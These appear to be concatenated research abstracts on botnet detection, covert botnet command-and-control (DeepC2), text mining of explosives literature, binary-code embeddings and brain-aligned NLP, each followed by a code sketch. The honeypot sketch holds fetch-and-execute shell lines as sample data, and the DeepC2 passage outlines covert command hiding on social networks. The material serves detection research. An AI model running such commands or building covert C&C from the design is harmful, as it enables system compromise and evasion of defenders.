Computer security has been plagued by increasingly formidable, dynamic, hard-to-detect, hard-to-predict, and hard-to-characterize hacking techniques. Such techniques are very often deployed in self-propagating worms capable of automatically infecting vulnerable computer systems and then building large bot networks, which are then used to launch coordinated attacks on designated targets. In this work, we investigate novel applications of Natural Language Processing (NLP) methods to detect and correlate botnet behaviors through the analysis of honeypot data. In our approach, we take behaviors observed in the shell commands issued by intruders during captured internet sessions and reduce them to collections of stochastic processes that are, in turn, processed with machine learning techniques to build classifiers and predictors. Our technique yields a new ability to cluster botnet source IP addresses even when they attempt to obfuscate their penetration attempts through rapid or random permutation techniques.
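To make the idea concrete, here is a minimal sketch of one way to cluster honeypot sessions by their shell-command content, assuming scikit-learn and a toy set of captured sessions. The paper's exact stochastic-process features are not specified here, so character n-gram TF-IDF stands in as a simplified illustration; the sessions and DBSCAN parameters are hypothetical.

# Hypothetical sketch: cluster honeypot shell sessions by command content.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import DBSCAN

sessions = [  # toy examples of captured intruder command lines
    "wget http://host-a/x.sh; chmod +x x.sh; ./x.sh",
    "curl -O http://host-b/y.sh && chmod 777 y.sh && sh y.sh",
    "cat /proc/cpuinfo; uname -a; ls /tmp",
]

# Character n-grams tolerate the rapid or random renaming intruders use.
vec = TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5))
X = vec.fit_transform(sessions)

# DBSCAN with cosine distance groups sessions with similar command behavior;
# label -1 marks sessions that match no cluster.
labels = DBSCAN(eps=0.6, min_samples=2, metric="cosine").fit_predict(X)
for label, session in zip(labels, sessions):
    print(label, session)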
Command and control (C&C) is the essential component of a botnet. In previous C&C schemes using online social networks (OSNs), the botmaster's identifiers are reversible: after a bot is analyzed, the botmaster's accounts can be predicted in advance. Additionally, abnormal content from explicit commands may expose botmasters and raise anomalies on OSNs. To overcome these deficiencies, we propose DeepC2, an AI-powered covert C&C method on OSNs. By leveraging neural networks, bots can find botmasters by their avatars, which are converted into feature vectors and built into the bots. Defenders cannot predict the botmaster's accounts from the vectors in advance. Commands are embedded into normal content (e.g., tweets and comments) using easy data augmentation and hash collision. Experiments on Twitter show that command-embedded content can be generated efficiently, and that bots can find botmasters and obtain commands accurately. Security analysis of different scenarios shows that it is hard to predict the botmaster's avatars. By demonstrating how AI may help promote covert communication on OSNs, this work provides a new perspective on botnet detection and confrontation.
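The core matching step can be illustrated with a deliberately abstract sketch: the bot stores only a feature vector of the botmaster's avatar and compares candidate avatar vectors against it, so the target avatar cannot be recovered from the bot in advance. The vector file and threshold below are hypothetical placeholders, assuming NumPy.

# Conceptual sketch of avatar matching by feature vector (simplified).
import numpy as np

def cosine(a, b):
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

# The bot carries only this vector, not the avatar image itself.
target_vec = np.load("avatar_feature_vector.npy")  # hypothetical file

def matches_botmaster(candidate_vec, threshold=0.98):
    # One-way check: the vector does not reveal which avatar produced it.
    return cosine(candidate_vec, target_vec) >= threshold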
Botnets are increasingly used by malicious actors, posing a growing threat to a large number of internet users. To address this danger, we propose to study methods to detect botnets, especially those that are hard to capture with commonly used methods such as signature-based and existing anomaly-based approaches. More specifically, we propose a novel machine learning based method, named Recurrent Variational Autoencoder (RVAE), for detecting botnets through the sequential characteristics of network traffic flow data, including botnet attacks. We validate the robustness of our method on the CTU-13 dataset, where the testing dataset is chosen to contain different types of botnets than the training dataset. Tests show that RVAE is able to detect botnets with the same accuracy as the best known results published in the literature. In addition, we propose an approach to assign an anomaly score based on probability distributions, which allows us to detect botnets in streaming mode as new network statistics become available. This online detection capability would enable real-time detection of unknown botnets.
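A minimal sketch of a recurrent VAE and its anomaly score follows, assuming PyTorch; the paper's exact architecture, input features, and hyperparameters are not given here, so the GRU sizes and the score (per-sequence reconstruction error plus KL term) are illustrative stand-ins.

# Minimal recurrent VAE sketch; flows with high score are flagged anomalous.
import torch
import torch.nn as nn

class RVAE(nn.Module):
    def __init__(self, n_features, hidden=64, latent=16):
        super().__init__()
        self.enc = nn.GRU(n_features, hidden, batch_first=True)
        self.mu = nn.Linear(hidden, latent)
        self.logvar = nn.Linear(hidden, latent)
        self.dec_in = nn.Linear(latent, hidden)
        self.dec = nn.GRU(n_features, hidden, batch_first=True)
        self.out = nn.Linear(hidden, n_features)

    def forward(self, x):                       # x: (batch, time, features)
        _, h = self.enc(x)
        mu, logvar = self.mu(h[-1]), self.logvar(h[-1])
        z = mu + torch.randn_like(mu) * (0.5 * logvar).exp()  # reparameterize
        y, _ = self.dec(x, self.dec_in(z).unsqueeze(0))       # teacher-forced
        return self.out(y), mu, logvar

def anomaly_score(model, x):
    recon, mu, logvar = model(x)
    rec = ((recon - x) ** 2).mean(dim=(1, 2))   # per-sequence error
    kl = -0.5 * (1 + logvar - mu.pow(2) - logvar.exp()).sum(dim=1)
    return rec + kl                             # higher means more anomalous

# Usage on a random placeholder batch of 8 flows, 20 steps, 10 features:
print(anomaly_score(RVAE(10), torch.randn(8, 20, 10)))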
The number of scientific journal articles and reports published about energetic materials every year is growing exponentially, so extracting relevant information and actionable insights from the latest research is becoming a considerable challenge. In this work we explore how techniques from natural language processing and machine learning can be used to automatically extract chemical insights from large collections of documents. We first describe how to download and process documents from a variety of sources: journal articles, conference proceedings (including NTREM), the US Patent & Trademark Office, and the Defense Technical Information Center archive on archive.org. We present a custom NLP pipeline that uses open-source NLP tools to identify the names of chemical compounds and relate them to function words (underwater, rocket, pyrotechnic) and property words (elastomer, non-toxic). After explaining how word embeddings work, we compare the utility of two popular word embedding methods, word2vec and GloVe. Chemical-chemical and chemical-application relationships are obtained by performing computations with word vectors. We show that word embeddings capture latent information about energetic materials, so that related materials appear close together in the word embedding space.
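As a small illustration of the word-vector computations, here is a sketch that trains word2vec on a toy corpus and queries for nearby materials, assuming gensim; the corpus and query terms are hypothetical stand-ins for the full journal and patent text the paper uses.

# Hypothetical sketch: chemical-application relations via word2vec (gensim).
from gensim.models import Word2Vec

corpus = [
    "rdx is a common military explosive used in plastic bonded formulations".split(),
    "hmx offers higher detonation velocity than rdx".split(),
    "ammonium perchlorate is a standard rocket propellant oxidizer".split(),
]

model = Word2Vec(corpus, vector_size=50, window=5, min_count=1, epochs=50)

# Related materials land close together in the embedding space.
print(model.wv.most_similar("rdx", topn=3))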
Given a closed-source program, such as most proprietary software and viruses, binary code analysis is indispensable for many tasks, such as code plagiarism detection and malware analysis. Today, source code is very often compiled for various architectures, making cross-architecture binary code analysis increasingly important. A binary, after being disassembled, is expressed in an assembly language. Thus, recent work has started exploring Natural Language Processing (NLP) inspired binary code analysis. In NLP, words are usually represented as high-dimensional vectors (i.e., embeddings) to facilitate further processing, which is one of the most common and critical steps in many NLP tasks. We regard instructions as words in NLP-inspired binary code analysis and aim to represent instructions as embeddings as well. To facilitate cross-architecture binary code analysis, our goal is that similar instructions, regardless of their architectures, have embeddings close to each other. To this end, we propose a joint learning approach to generating instruction embeddings that capture not only the semantics of instructions within an architecture, but also their semantic relationships across architectures. To the best of our knowledge, this is the first work on building a cross-architecture instruction embedding model. As a showcase, we apply the model to one of the most fundamental problems in binary code similarity comparison, semantics-based basic block comparison, and the solution outperforms the code-statistics-based approach. This demonstrates that it is promising to apply the model to other cross-architecture binary code analysis tasks.
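The joint objective can be sketched as a mono-architecture skip-gram context loss plus a cross-architecture alignment loss that pulls semantically equivalent instruction pairs together, assuming PyTorch; the shared vocabulary size, batch layout, and loss weight below are hypothetical.

# Conceptual sketch of the joint instruction-embedding objective.
import torch
import torch.nn as nn
import torch.nn.functional as F

emb = nn.Embedding(10000, 128)  # shared vocabulary over all architectures

def skipgram_loss(center, context, negatives):
    # center, context: (B,) instruction ids; negatives: (B, K) sampled ids
    c, o, n = emb(center), emb(context), emb(negatives)
    pos = F.logsigmoid((c * o).sum(-1))
    neg = F.logsigmoid(-(c.unsqueeze(1) * n).sum(-1)).sum(-1)
    return -(pos + neg).mean()

def alignment_loss(x86_ids, arm_ids):
    # Semantically equivalent x86/ARM instructions get nearby embeddings.
    return (emb(x86_ids) - emb(arm_ids)).pow(2).sum(-1).mean()

def joint_loss(batch, lam=1.0):
    # batch["mono"]: skip-gram triples; batch["cross"]: equivalent pairs
    return skipgram_loss(*batch["mono"]) + lam * alignment_loss(*batch["cross"])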
Neural network models for NLP are typically implemented without the explicit encoding of language rules, and yet they break one performance record after another. This has generated a lot of research interest in interpreting the representations learned by these networks. We propose here a novel interpretation approach that relies on the only processing system we have that does understand language: the human brain. We use brain imaging recordings of subjects reading complex natural text to interpret word and sequence embeddings from four recent NLP models: ELMo, USE, BERT, and Transformer-XL. We study how their representations differ across layer depth, context length, and attention type. Our results reveal differences in the context-related representations across these models. Further, in the transformer models, we find an interaction between layer depth and context length, and between layer depth and attention type. We finally hypothesize that altering BERT to better align with brain recordings would enable it to also better understand language. Probing the altered BERT with syntactic NLP tasks reveals that the model with increased brain alignment outperforms the original model. Cognitive neuroscientists have already begun using NLP networks to study the brain, and this work closes the loop to allow the interaction between NLP and cognitive neuroscience to be a true cross-pollination.
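One common way to quantify brain alignment, sketched below under stated assumptions, is an encoding model: ridge regression from a layer's embeddings to the brain recordings, scored by held-out per-voxel correlation. The arrays here are random placeholders for real stimulus-aligned fMRI data, and scikit-learn is assumed; the paper's precise evaluation protocol may differ.

# Sketch: score how well a model layer predicts brain responses.
import numpy as np
from sklearn.linear_model import RidgeCV
from sklearn.model_selection import train_test_split

X = np.random.randn(400, 768)  # layer activations per stimulus (placeholder)
Y = np.random.randn(400, 500)  # brain responses per voxel (placeholder)

Xtr, Xte, Ytr, Yte = train_test_split(X, Y, test_size=0.2, random_state=0)
enc = RidgeCV(alphas=np.logspace(-2, 4, 7)).fit(Xtr, Ytr)
pred = enc.predict(Xte)

# Per-voxel Pearson correlation: higher means the layer predicts that voxel better.
r = [np.corrcoef(pred[:, v], Yte[:, v])[0, 1] for v in range(Y.shape[1])]
print("mean voxel correlation:", float(np.mean(r)))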